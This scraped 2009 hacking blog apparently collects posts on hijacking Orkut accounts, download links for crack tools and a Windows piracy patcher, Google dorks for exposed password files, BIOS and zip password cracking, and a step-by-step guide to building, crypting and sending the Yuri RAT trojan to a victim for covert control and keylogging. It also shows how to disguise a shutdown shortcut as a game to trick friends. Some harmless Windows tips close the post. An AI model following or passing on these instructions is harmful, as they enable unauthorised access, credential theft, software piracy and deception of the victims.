Your Ad Here

Wednesday, July 15, 2009

How To Hack Orkut ???

Google uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack.
First Level- Security-SSL or 128 bit secured connection
Second Level- Google account checks for cookie in the sytem of user
Third Level- Google provides a redirection to the entered User information
Fourth Level- Google doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!

It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!

Using Keyloggers is one of the easiest way to hack an Orkut (or any other email) password.Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

Phishing Attack is the most popular way of hacking/stealing other’s password.By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.

Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.

Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.So be careful, javascripts can even be used to hack Orkut!

Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’.This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.

So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker.Hence your Orkut account saved.

So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.

If you would like to share something, comment here and I will add up here with a credit to your name

AIO Crack Searching & Shareware Hacking 2008


Info
a- Crack Searching Programms:

1- Craagle v1.91
2- CrackDownloader Plus v2.2 (released 10/07/2005)
3- Serials3k
4- Crack Searcher
5- Crack Buster v1.3
6- Galaxy search
7- Crack Wizard

b- Shareware Hacking Programs:

1- Never Expire v2.0
2- Trial Doctor v1.3.1
3- Trial Reset v2.5
4- MicroBest CrackLock v3.8.4
5- Date Cracker 2000
6- Date Facker 32
7- Date Hacking v1.2

c- AIO eBook bonus:

Beginner Olly Cracking Tutorials
[9 detailed step-by-step tutorials]

Beginner tutorial 1: Serial fishing
Beginner tutorial 2: Internal Keygen and Patching
Beginner tutorial 3: Unpacking and Patching
Beginner tutorial 4: unpacking and patching, a more complex case v.1.1
Beginner Tutorial 5: Inline Patching
Beginner Tutorial 6: Packers theory v1.1
Beginner Tutorial 7: Cracking using Memory BP’s
Beginner Tutorial 8: Breakpoints Theory v1.2
Beginner Tutorial 9: Defeating Magic Byte Protection

Download:

http://w16.easy-share.com/1702589431.html


26 Mobile Antiviruses (All Versions)

26 Mobile Antiviruses (All Versions) | 8.27Mb
This collection contains 26 mobile antiviruses for all models…

Symbian OS 6 - 7 - 8
——————————–
Anti Commawarrior
Anti Cabir
Avira Antivirus
Bitdefender Antivirus
BullGuard Antivirus
Commander Antivirus
Disinfector
F-Secure Antivirus
Kaspersky Antivirus
McAfee Antivirus
NetQin
Norton Antivirus
Panda Antivirus
Simworks Antivirus
Smobile VirusGuard
Symantec Antivirus
TrendMicro Mobile Security
Zeon Antivirus


Symbain OS 9.1 & 9.2
———————————–
exo Virus Stop
F-Secure
Jiangmin Antivirus
Kasperksy Antivirus
NetQin Antivirus

TrendMicro 
Mobile Security

DOWNOAD:

Download Depositfiles
Click Here

Download Easyshare
Click Here

RapidShare Download Link: 
Click Here

Windows WGA Patcher Permanent Kit - Make your Windows XP Genuine Windows

Windows WGA Patcher Permanent Kit - Make your Windows XP Genuine Windows | 1.04 MB

These Prorames included, Enables Pirated PC to become Genuine.
- You No longer need to find cracks via the internet!
- You Can Download products from Microsoft that uses WGA, Such as Windows Defender, WMP11, IE7, etc
- Use Windows Update!
-Another Cool thing is that you can Install Program that Require Validtaion, and you won’t need a crack such as WGA Patcher Classics!
It i’ll say your PC is Genuine!

Download:

Rapidshare

Easy-share

Kewlshare

Trial Reset 3.4 Final Portable(Extend the period trial of any Windows Application)

Trial Reset 3.4 Final Portable | 7.96 MB
Extend the period trial of any Windows Application of your choice


Trial-Reset is an registry cleaning tool. The main function of Trial-Reset is remove the keys generated by commercial and freeware protector.Trial-Reset doesn’t crack the program but only extends the Trial period.


What’s new v3.4 Final (Public):

-Updated support for WinLicense (Ring-0 Protection)

Download:

Deposit files

Easy-share

Rapid Hacker v4.5 Immortality Edition


Rapid Hacker is the ultimate tools for Hacking Rapidshare for free downloading from its site by faking IP Addresses

Download:
Depositfiles
Click to Download from DepositFiles
Easy Share
Click to Download from Easy-Share
MegaUpload
Click to Download from MegaUpload

The best friend of a hacker - GOOGLE

Google hacking at its finest..


Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3’s
…… (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in. 

Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”


Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

# -FrontPage-” inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

“AutoCreate=TRUE password=*” 
This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author’s site at: http://www.coara.or.jp/~passy/

“http://*:*@www” domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

http://*:*@www” bangbus or “http://*:*@www”bangbus

Another way is by just typing
“http://bob:bob@www”

“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:”htaccess|passwd|shadow|htusers”
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

Let’s pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - “Windows XP Professional” 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of ‘fake’ porn sites that trick you.

or if you want to find the serial for winzip 8.1 - “Winzip 8.1″ 94FBR

How to Change Password on Windows without Original Password

Here is a little guide that I have made which teaches you how to change the password of any account on the computer you are currently using without knowing the original password. This is useful for many occasions such as if you forget the password to your primary account on your computer but still have access to another 0ne or if you simply want to prank your family members. 

This has been tested on both Windows XP and Windows 7.

For this to work you must have access to another account because you have to use Command Prompt or CMD to change the password.

Here is how to do it:
Open Command Prompt (CMD) by going to Start -> Run -> cmd.exe
Type in ‘net users’. This will show you a list of all the accounts on the computer. This is just to check and make sure you know the EXACT username of the account you want to change the password for.
Next, you need to type in ‘net user (whatevertheusernameis) *


Next you shall get a prompt asking you for the new password:



Finally it shall ask you to repeat the new password, click enter and BAM, you have now changed the password without knowing the original one

WiFi Attacking Tools 2009 |35 Mb


1. AirCrack 2.1

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW 
attack, thus making the 
attack much faster compared to other WEP cracking 
tools. In fact, Aircrack-ng is a set of 
tools for auditing wireless networks. 

2. AirSnort 0.2.6 
AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough 
packets have been gathered. 802.11b, using the Wired Equivalent Protocol (WEP), is crippled with numerous security flaws. Most damning of these is the weakness described in ” Weaknesses in the Key Scheduling Algorithm of RC4 ” by Scott Fluhrer, Itsik Mantin and Adi Shamir. Adam Stubblefield was the first to implement this 
attack, but he has not made his software public. AirSnort, along with WEPCrack, which was released about the same time as AirSnort, are the first publicly available implementaions of this 
attack.

3. AeroPeek 2.02
AiroPeek NX captures and decodes 
packets, with special emphasis on the 802.11 protocol. AiroPeek NX receives all wireless LAN 
packets based on user settable configuration parameters and stores these 
packets in memory. For example, you can set a filter to capture all 

packets, only 802.11 authentication request frames, or all frames except beacons frames. Just about any combination of packet types and protocols are possible.

DOWNLOAD:

Deposit files:http://depositfiles.com/files/g7dnb95fp

Uploading.com:http://uploading.com/files/GT1N53L8/WiFi_Stealer_AIO_2009.rar.html

Easy share:http://www.easy-share.com/1906634692/WiFi_Stealer_AIO_2009.rar

Shutting Down A Remote(Vicitim’s) PC Using Any Of The Messenger


The tutorial actually uses a command nothing else, it’s just a prank you can play it with your friend…….

1) Right click on desktop, and then go New, then Shortcut.

2) Then in the “type location of the item” you want to type:
%windir%\system32\shutdown.exe -s -t 60 -c “Learn Hacking At hackndownload.blogspot.Com”

Send It your freind using any of the messenger like Yahoo!, MSN etc. etc

I would prefer sending it in a zip file.
You can replace “Learn Hacking At Hak9.Com” with your own message and “60″ is the amount of time the victim will recieve on its computer screen, within which the computer will shutdown. 

To make t more attractive:
*Rename it like game, porn depending on the age.
*replace its icon with an attractive icon, you can find icons on the web(refer to the previous article google searches hacking to find the icon)

Countermeasures:
1) open up run, by going to start and clicking on run…
2) type shutdown -a and hit enter.

Passsword crackers ALL IN ONE

This password cracking pack includes 6 different crackers used for :
* Asteric Logger
* Dial-Up Password
* IM Passwords
* Mail Client Passwords
* Network Password
* Protected Storage Passwords

http://rapidshare.com/files/239339781/Password.Crackers.AIO.rar

http://www.easy-share.com/1905465510/Password.Crackers.AIO.rar

Friday, July 10, 2009

Crack BIOS password

Want to learn how to crack bios password here is the best way to crack the bios password in win 95/98:

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: "debug" (without quotes ninja.gif )
4) type the following lines now exactly as given.......
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine


password protection gone!!!!!!!!!!!!! biggrin.gif

EnjoYYYYYYYYYY

PS: I tested this in Award Bios........
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data..........


The use of this code is entirely at ur risk.......... It worked fine for me..........

Cracking zip password files

How to crack zip password files given below is best tut to crack password for zip files..
Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program

Remote hacking

Hack any computer,U can operate or hack any other computer from your computer,U can hack his computer,copy files from his computer to your computer without his knowledge & put files from your computer to his/her computer.

Remote Hacking is 90% undetectable .

Here we learn to hack a computer any where in this whole world.
A Major Notice If you are behind a router you will need to port forward your router. To do this you can use a DMS. Its hard to explain as every router has a different interface ( homepage that has a different layout ) so i suggest you go to Google and search portforward.com. It will teach you how to port forward your router there.

To begin with you will need these three tools,download them given below:

1.Daemon_Crypt

2.PC_GUard

3.Yuri_Rat

After downloading these tools ur first step is to open Yuri Rat and then click on server build

You should now have the following the screen

In this screen I want you to put your IP address into the DNS/IP section.

To get IP Address go to Start > Run > Type CMD and hit enter. When the black box appears type in IPCONFIG. You will then have your IP Address

Port: You Can Leave As Default (-7898-)

Assigned Name: Doesn’t effect how the server will work its just to keep you more organized so if you wanted to hack your friend “JOE” and specifically make this server for him then you may want to type something like “JOES TROJAN”.

Server Install Name: You should leave this as default as I myself don’t know what the difference is as every server you make is named server when it is 1st created anyway. Do not change it as it may make problems but I am not sure.

Ok as you can see there are more settings on the right hand side. I am going to recommend you settings for different purposes.

To Hack A Friend For Fun: Uncheck Everything Unless You Want To Do Optional
(OPTIONAL) Melt Server - Your server will disappear into another folder
(OPTIONAL) Custom Icon if you want to make it more believable or something then get an icon of super Mario or something you get my drift

To Find Out Valuable Information: Check Everything

Now You Are Finished Click Build.

Your server will then be saved to your C:\ or Hard Drive which ever you know it as. Now we are going to make the server about 90% Undetectable. Only once has one of my servers been detected by an anti virus and I think it was a Norton not sure which version. Ive scanned more then once with Kasper Sky & Symantec Anti Virus and every time they said its clean so lets begin

Open Up Daemon Crypt

Select Your File by clicking browse and going to the folder your server is in. If you have not moved it, it will most likely be in C:\

So Now You Have This

Click On Crypt and then you can close Daemon Tools

Now Install Your Pc Guard for Win32

When you open it you should get this

Ok you have to do basically the same thing as what you did with daemon tools. Click Browse and then find your server so that you have this

You then want to click on the General Settings and put these settings

Ok now you want to go to customization and make sure nothing is ticked

For the last step you want to click the protection methods tab and set it to plain. And then click on protect

Your server is now undetectable =)

Ok so now we created our server and everything is ready to go. Now our real work start trapping, say ur friend this is nice article on hacking or a sexy pic of a star, or u can trap him/her depending upon thier likes, The Server has been send to their system & they have opened it. If you checked the melt server option then the server will basically evaporate into their computer.

Ok so now you have the server running on there comp and it has opened up the default port for you to connect to.

Once again open Yuri Rat and click on listen. Yuri rat will then listen for your online servers that you have gave to people running on the default port 7898. If the person who you sent the rat to is not online you cant connect. When the server you sent out to his/her a balloon notification will pop up. Note that yuri rat should still be listening for the servers. The server will show up in yuri rat. You right click and press connect. And there you go. you are now successfully connected to your victim

Now withoutt up-loading plugins from yuri rat to his/hers pc u r able to operate certain files or programs such as download files from there pc & place ur files onto his/her pc.

When you are connected click on plug ins and them upload all of them.

You will then have access to keyloggers, screen capture and much more. If you get stuck click on the help button and it will tel you more about plugins

Tricks and cheats in Windows

Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC
1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s
Shutdown Trick !

Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.


Speed Up Ur Shut down !!


Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).

and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.


**new **
Crazy !!
Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"


Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


n u are done..

~cheers~


System information


system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
'systeminfo'. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only).


lock pc just by double clicking mouse

You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter 'rundll32.exe
user32.dll,LockWorkStation' in the location field.
Give the shortcut a name you like. That's it -- just
double click on it and your computer will be locked.
And if that's not easy enough, Windows key + L will do
the same.



SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)


Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad..


Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

~ Cheers ~


*

Remove the Username and picture from Windows XP New Start Menu

The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say...

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You'll end up with a blue space at the top of the Start Menu.



To get back the username and the picture, reverse the above procedure.



For the New Start Menu, Windows XP looks for the .bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

~ Cheers ~.


Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!

Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.

Voilla!!

or

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

or

Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...


NOTEPAD "world trade centre trick".. :Rahul


Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

log trick !! make ur Notepad a diary !!

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

~ cheers ~


SPEED UP MENU DISPLAY.!!


When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.



CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!


Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!


And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".

How to make your Desktop Icons Transparent

Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"


DISPLAY MESSAGE ON STARTUP.


Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart


AUTO DELETE TEMPORARY FOLDER.!!

ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


make ur pdf files to speak

make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher

